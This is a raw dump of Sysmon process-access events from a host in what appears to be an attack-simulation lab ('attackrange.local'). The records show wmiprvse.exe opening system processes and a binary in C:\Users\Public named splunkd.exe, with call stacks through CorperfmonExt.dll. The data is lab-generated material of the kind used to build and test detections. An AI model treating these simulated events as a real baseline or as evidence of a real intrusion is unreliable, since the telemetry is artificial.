13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 